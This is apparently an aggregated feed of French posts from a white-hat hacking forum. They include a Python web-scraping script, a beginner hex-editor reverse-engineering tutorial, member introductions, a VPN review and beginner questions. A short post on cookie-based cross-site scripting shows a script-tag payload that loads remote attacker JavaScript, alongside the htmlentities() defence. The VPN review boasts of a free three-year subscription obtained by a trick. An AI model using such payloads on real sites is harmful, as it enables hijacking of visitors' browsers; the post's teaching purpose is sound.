Ce que j'essaie de montrer est qu'avec des connaissances l'on peut facilement établir des petits programmes afin de réaliser des techniques simples.Le code suivant a été réalisé en 2h de temps, je n'ai donc pas traité les erreurs (except), ni chercher à optimiser certaines parties, ni à extraire sur un fichier, mais surtout à créer rapidement un script utilisant beautiful, request et tdlextract afin que vous perceviez leurs utilisations au sein d'un programme.


Si ces modules vous intéressent, ils peuvent être étendus plus sur un spectre d'action plus large que le mien.



Code:

# -*- coding: cp1252 -*-

# -*- coding: UTF-8 -*-


##### Modules import #####

from bs4 import BeautifulSoup
import requests
import urllib.request
import re
import tldextract
import os

##### Mise en place des Fonctions #####

def Scraping():
    url = input ("Entrer a website à Parser (www.site.com): ")
    r  = requests.get("http://" +url)
    data = r.text
    soup = BeautifulSoup(data, "html.parser")
    for link in soup.find_all('a'):
        print(link.get('href'))

def Extract():
    Extract = input ("Entrer l'url d'un site à extraire : ")
    Ext = tldextract.extract(Extract)
    print (Ext, Ext.subdomain, Ext.domain, Ext.suffix, Ext.registered_domain, '.'.join(Ext[:2]))


def ExtractHTML():
    url = input("Entrer l'URL du Website :")
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    print(respData)


def ExtractOnly():
    url = input("Entrer l'URL du Website :")
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    balise = input ("Entrer les balises à extraire (p,a,...): ")
    paragraphs = re.findall(r'<' + balise + '>(.*?)</' + balise + '>',str(respData))
    print (paragraphs)



def menu():
    os.system("clear")
    print ("###################################################")
    print ("#              Scraping Website                  #")
    print ("#                Scrap & Extract                  #")
    print ("#              -----------------                #")
    print ("#                DreAmuS/HelioS                  #")
    print ("###################################################")
    print ("")
    print (" [+] 1 - Scraping les Liens d'un website")
    print (" [+] 2 - Extraire les Noms de Domaines")
    print (" [+] 3 - Extraire HTML")
    print (" [+] 4 - Extraire une partie de l'URL")
    print (" [+] 5 - Quitter")
    print ("-------------------------------------------------)
    choix = int(input("Tapez Votre Choix >>> "))

    if (choix == 1):
        Scraping()
        menu()
    elif (choix ==2):
        Extract()
        menu()
    elif (choix == 3):
        ExtractHTML()
        menu()
    elif (choix == 4):
        ExtractOnly()
        menu()
    elif (choix == 5):
        quit
    else:
        menu()


if __name__=="__main__":
    menu()


1 - Scraping les Liens d'un website : On va scraper les liens en rapport avec le NDD
2 - Extraire les Noms de Domaines : On va extraire les NDD en rapport
3 - Extraire HTML : On va extraire l'url de la page demandé
4 - Extraire une partie de l'URL : On va extraire une partie spécifique (exemple: on met l'url d'une page et p qui scrapera que ce qu'il y a entre <p> et </p>)
5 - Quitter : On quitte le programme qui reviens en boucle


Ainsi, vous verrez qu'il est possible d'utiliser cette première ébauche pour rajouter des modules et fonctions afin de par exemple comme l'avait à l'époque cet anglais en scrapant l'intégralité des fichiers d'une prison, en tâtonnant et en précisant son script sur les bonnes balises.Il avait ainsi sans avoir besoin de voir la page enregistrer sous fichier texte, les fichiers prouvant la puissance du scraping devant des obstacles.

En espérant cela vous a plu.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OWu7TS
via IFTTT

Tutoriel Premier pas en Reverse Engineering

Salutation !

Avant toutes choses j'aimerai éclaircir quelques points : ce tutoriel s’adresse à des débutants en reverse engineering et si vous avez des questions n'hésitez pas j'essaierai d'y répondre au plus vite (- de 24H).
Sur ce bon tuto !


Beaucoup de gens pensent que le Reverse Engineering est quelque chose de difficile, où il faut savoir décrypter parfaitement le langage ASM pour pouvoir ne serait ce que commencer à comprendre les agissements d'un programme … Que n'est ni !

Dans ce premier tutoriel (oui il y en aura donc d'autres:p) nous allons faire nos premier pas dans ce monde incroyable qu'est le reverse engineering, ici d'un PE (Portable Exécutable) … enfin d'un .exe Windows quoi ! :p

Pour ce tutoriel je n'utiliserai qu'un outil très pratique qu'est un éditeur hexadécimal !
Personnellement j'utilise Ghex (sous Ubuntu) et Frhed sous Windows (ici je serait sous Ghex), tout deux sont à mon sens très bien et surtout gratuit mais libre à vous d'en n'utiliser d'autres.
Vous pouvez d’ailleurs utiliser un simple éditeur de texte mais bon c'est moi classe. :cool:

Nous prendrons pour exemple ici un utilitaire de test réseau, notre but sera de prouver uniquement à la lecture du fichier avec notre éditeur hexadécimal que notre exécutable utilise bien des fonctions réseaux.

Bon à l'attaque !

Commençons par ouvrir notre fichier avec notre éditeur hexadécimal et la … WTF ?!

cour-1.jpg

Ne partez pas tout de suite les choses vont commencer a être intéressantes !
Je vous rassure nous travaillerons uniquement grâce à la partie de droite.

Bon maintenant nous allons devoir commencer nos recherches …
Le fichier est un exécutable Windows qui utilise des fonctions réseau jetons un coup d’œil aux DLL réseaux de Windows : ils sont au nombre de deux (il y en a plus mais se sont les plus utilisé/important) : wsock32.dll et ws2_32.dll.
Très bien cherchons si ces DLLs sont mentionnés ici et magie :

cour-2.jpg

Petite astuce : le nom du dll peut être transcrit en hexadécimal de différentes manière, par exemple : « WS2_32.DLL », « ws2_32.DLL », « ws2_32.dll », « WS2_32.dll » ...
Donc n'abandonner pas vos recherches si vous ne trouvez pas du premier coup, essayez les diverses écritures comme dans les exemples ci-dessus.


Maintenant nous savons que l’exécutable charge une librairie dynamique pour utiliser des fonctions réseaux.
Voyons maintenant s'il utilise vraiment ces fonctions …

NB : 1) les fonctions des DLLs Windows ont, à quelques exception près les même nom que celle en C/C++. Par exemple la fonction de connection du DLL ws2_32.dll (et aussi de wsock32.dll) est connect(), comme en C/C++.
2) Pour connaître toutes les fonctions stockés dans un DLL il existe un très bon outil gratuit (uniquement pour Windows) qui se nomme Depends.


Nous pouvons ici voir diverses fonctions réseaux chargés comme par exemple : connect(), send(), closesocket() ...

cour-3.jpg

Nous pouvons donc affirmer que cet exécutable utilise bien des fonctions réseaux.
Mission Accomplie !!!

Alors c'était si compliqué que ca ?

HexaHacker
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MXfYCZ
via IFTTT

Le nouveau Codark !

Pseudo (+autres si plusieurs) : Codark, scordailo (pour les jeux)

Connaissances informatiques générales : je commence à avoir de bonne base en html 5, j'ai passé 1 semaine à apprendre le langage python sans continué, j'ai pour projet d'apprendre le php,c/c+. Je suis encore un débutant ! Mais un débutant motivé.

Connaissances en hacking : je n'ai pas de réel compétence je regarde des tutos à droite à gauche je me renseigne tranquillement, je préfère maîtriser les langages avant de commencer vraiment à m'impliquer dans le "hacking".

Système d'exploitation principal : Windows 10, je vais passer sur ubuntu prochainement et si mes projets aboutissent j'irai sur Kali.
Je viens sur ce forum pour : Je ne viens pas sur le forum pour qu'on me dise fais si fais sa, surtout pour avoir des conseils de professionnels dans la matière, se forum me parait le plus approprié pour faire mes débuts dans une communauté de white-hat.

J'ai connu ce forum via : Mes recherches personnelle.

Informations supplémentaires (job, intérêts, autres...) : Je vais me lancer dans un Bac pro SEN (Electronique et informatique) en alternance. J'aimerai poursuivre mes études dans la sécurité informatique.

Ps : J’espère ne pas avoir fais trop de faute.

Cordialement Codark ! :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q4XKQq
via IFTTT

lundi 5 octobre 2015

Tutoriel Cookie Site Scripting : le danger du stockage abusif dans les cookies

Salutation !

Bon à la vue du titre vous devez surement vous dire ceci :
Le Cookie Site Scripting ?! Mais qu'est ce donc ?

Et bien j'ai découvert cette faille il y a peu de temps.
Bien que cette faille soit peu rependue son exploitation est simple, il s'agit tout bêtement d'un Cross Site Scripting mais via les cookies !
Je m'explique : imaginons qu'un site, par exemple désire stocker sur votre machine (via un cookie) un message qui s'affichera à votre connexion au site ...
Prenons un exemple simple : "Bienvenue [PSEUDO] !"
Vous voyez où je veux en venir ?
Un utilisateur malveillant pourrait réécrire le cookie et y placer un code malveillant : "<script type="text/javascript" src="http://ift.tt/1LtHxX2;
Et hop le tour est joué le pirate vient d'inclure son shell ou pire encore :eek:!

Donc évitez de stocker n'importe quoi dans vos cookies, ou alors dans ce cas utilisé par exemple la fonction PHP htmlentities() !

HexaHacker


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBCbIO
via IFTTT

Présentation HexaHacker

Salutation !

Bon une présentation s'impose !
Donc je suis HexaHacker (enfin tout le monde m'appelle hexa :p).
Je suis programmeur en C/C++ HTML/CSS PHP/MySQL et Python et passionné depuis plusieurs années de sécurité informatique
Je connais pas mal de chose sur le Web Hacking (base et +), sur l'infection d'une machine sous Windows (toute versions confondue à partir de XP SP1) et la récupération d'informations clés et donc comment les protéger et contrer de potentiels intrusions.
Je tourne en Dual Boot Windows 7/Ubuntu.
Je viens sur ce forum pour pouvoir partager une nouvelle fois mes connaissances et aider les membres (je suis un ancien de hackforumfrench).
J'ai connu ce forum via Google tout simplement :cool:
Sinon j'aime les jeux vidéos, la musique enfin vous voyez quoi !

À bientôt sur le forum !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VBCbIJ
via IFTTT

Html 5

Bonjour à tous !

Je crée ce topic pour vous demander quelques conseils.
Depuis quelques temps j'apprend le langage HTML 5 (sur Openclassrooms), j'ai fini leur cour sur le html, mais je trouve que je ne maîtrise pas encore assez.
Avez vous des petits conseils pour que je m'améliore d'avantage ? Ou même des sites pour se perfectionner ?

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FQ1THL
via IFTTT

Virtualisation - Windows

Bonjour groupe!

Que penser vous d’installer Windows en vm sur une machine linux? Est-ce que Windows va être 100% fonctionnel?

Mon intention serait de formater mon PC, installer Ubuntu et mettre Windows en vm. De cette façon, je pourrais faire des snap shot de Windows en vm et si mon Windows est corrompu (virus, malware etc) je pourrais retourner à mon snap shot.

De plus mon PC va être plus performant puisse que je vais utiliser Ubuntu qui est moins gourmet.

Merci pour vos suggestions/réponses


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FPSXSM
via IFTTT

samedi 3 octobre 2015

Cisco Networking Academy

Bonjour groupe!

Je vous partage le dernier cours complet du CCNA. Il est anglais.

Je vous confirme que c'est le dernier, car je viens de terminer ce cours via Netacad

Mod 1: http://ift.tt/1OOFvkV
Mod 2: http://ift.tt/1OOFygu
Mod 3: http://ift.tt/1OOFvBd
Mod 4: http://ift.tt/1OOFvBf


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1KS0pLU
via IFTTT

vendredi 2 octobre 2015

Test VPN Freedome, F-Secure

Il y a peut de temps, j'ai rédigé un article pour gratter trois ans d'abonnements gratuit au VPN Freedome de la société F-Secure. POur ceux qui sont intéressés, tout est la : http://ift.tt/1jDNTqC

Étant donné que je n'ai trouve de test de ce VPN nul part, et quand ce moment c'est la mode de parler anonymat, c'est parti ! ;)

Freedome


La première section est en gros un bref résumé des autres et vous pourrez y voir sans trop de détails combien de sites le VPN a bloqué et combien de tentatives de tracking il a empêché. On peut aussi y voir notre géolocalisation (qui correspond en gros à la capitale de votre pays) Vous pourrez évidemment la changer et il y a au total une vingtaine d'emplacements que ce soit à Hong Kong ou encore Copenhague en passant par Melbourne... Bref l'embarras du choix !(notez que la connexion à un autre server est plutôt rapide).
C'est aussi ici que vous déciderez si vous activez la protection ou non.


Protection de la navigation
La deuxième section est elle aussi très très simple vous pouvez elle aussi choisir de l'activer ou non, elle s'assure juste de bloquer les sites quelle juge dangereux (vol de carte de crédit, de mots de passe...)

Anti-Tracking
Une nouvelle section un peux plus intéressante que la seconde est celle de l'Anti Tracker. LE VPN va en fait masquer votre IP (sans blague ?!) Mais il va aussi bloquer les cookies de tracking et va bloquer toute connexion entre le site que vous visitez actuellement et d'autres sites qui collectent des données. Comme vous pouvez le voir je suis actuellement à 58 après seulement une demi-heure de navigation et encore je suis très généreux comme quoi ça monte vite...
Navigation privée
On passe rapidement sur cette section sur laquelle la société nous explique bien gentiment que pour une meilleure sécurité, on peut emprunter son navigateur de recherche en cliquant sur le gros bouton vert juste là.
Paramètres
Ici vous pourrez paramétrez l'application en fonction de votre langue ou de vos préférences pour le lancement au démarrage...

L'abonnement
A l'abonnement... Comme vous pouvez le voir, je dispose ici de 1105 jours d'abonnement actif (et tout ça sans payer :D) Si vous n’êtes pas allés voir mon news ou si vous voulez rester en paix avec votre conscience, sachez que vous pourrez profitez de ce VPN pour le tarif de 50€/an . Vous pouvez évidemment vous connecter avec un même abonnement sur tous vos appareils (mobiles, PC...).


Aide
La section Aide qui vous renvoie vers les réseaux sociaux ainsi qu'à une FAQ ou encore un endroit pour laisser votre avis.
Avis
Voilà on arrive à la fin de ce test du VPN Freedome v.1.0.1958.0 Mon avis reste quand même positif. On s'en tire finalement avec un VPN au style simple et épuré qui est en plus efficace et tout ça avec en plus trois ans d'abonnement gratuits... Bref, je suis plutôt content.

Pour ceux que ça intéresse:

:D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PT6rgO
via IFTTT

jeudi 1 octobre 2015

Besoin d'aide par rapport a l'installation de WinCAP

bonsoir tout le monde j'ai un petit problème je suis sous windows 10 et je suis entrain de m'informer sur le "sniffer" grace aux cours de correspondances de the hackademy school. Et a la page 5 il demande de telecharger WinCAP a partir du site : http://ift.tt/1pMI5wE sauf que quand je l'installe un message d'erreur apparaît comme quoi WinCAP ne peut pas suporter windows 10 donc opération avorter.Comment puis-je faire pour continuer mes cours?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1O6zizc
via IFTTT